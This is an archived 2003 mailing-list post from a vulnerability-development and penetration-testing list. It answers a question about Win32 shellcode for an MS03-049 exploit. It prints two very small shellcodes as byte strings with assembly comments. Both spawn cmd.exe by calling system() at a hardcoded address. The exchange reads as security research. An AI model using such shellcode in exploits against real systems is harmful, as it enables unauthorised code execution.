Vulnerability Development mailing list archives

Previous By Date Next
Previous By Thread Next

RE: [PenTest] Re: Win32 Shellcode question.

From: "Brett Moore" <brett.moore () security-assessment com>
Date: Tue, 2 Dec 2003 11:34:30 +1300


http://www.newroot.de/projects/winsys.c
// very smaal win2000/NT local shellcode (smaalest i've seen)
/* 26byte execute system("cmd.exe "); written by newroot */
unsigned char hellcode[]=
      "\x8b\xec"                              //      mov     ebp, esp
      "\x55"                                  //      push    ebp
      "\x8b\xec"                              //      mov     ebp, esp
      "\x68\x65\x78\x65\x20"                  //      push    0x20657865
      "\x68\x63\x6d\x64\x2e"                  //      push    0x2e646d63
      "\x8d\x45\xf8"                          //      lea     eax,[ebp-0x8]
      "\x50"                                  //      push    eax
      "\xb8"                                  //      mov     eax,
      "\xad\xaa\x01\x78"                      //      0x7801aaad <- adress of system()
      "\xff\xd0"                              //      call    eax
      ;


; 14 byte no null byte execute system("cmd")
54                   push        esp            ; or pushf to put null terminator on
stack
68 63 6D 64 20       push        20646D63h      ; push cmd
54                   push        esp            ; push location of cmd
B8 BF 8E 01 78       mov         eax,78018EBFh  ; address of system()
FF D0                call        eax            ; call system


-----Original Message-----
From: Tobias Klein [mailto:tobias.klein () ewetel de]
Sent: Monday, December 01, 2003 9:07 PM
To: Vinay A. Mahadik; vuln-dev () securityfocus com;
pentest () yahoogroups com
Subject: [PenTest] Re: Win32 Shellcode question.


http://www.newroot.de/projects/winsys.c
greets newroot

At 19:29 27.11.2003 -0800, Vinay A. Mahadik wrote:

I was writing an exploit for the MS03-049 services.exe
stack overflow vuln



------------------------ Yahoo! Groups Sponsor ---------------------~-->
Buy Ink Cartridges or Refill Kits for your HP, Epson, Canon or Lexmark
Printer at MyInks.com. Free s/h on orders $50 or more to the US & Canada.
http://www.c1tracking.com/l.asp?cid=5511
http://us.click.yahoo.com/mOAaAA/3exGAA/qnsNAA/kgFolB/TM
---------------------------------------------------------------------~->

To unsubscribe from this group, send an email to:
PenTest-unsubscribe () yahoogroups com



Your use of Yahoo! Groups is subject to http://docs.yahoo.com/info/terms/
Previous By Date Next
Previous By Thread Next

Current thread: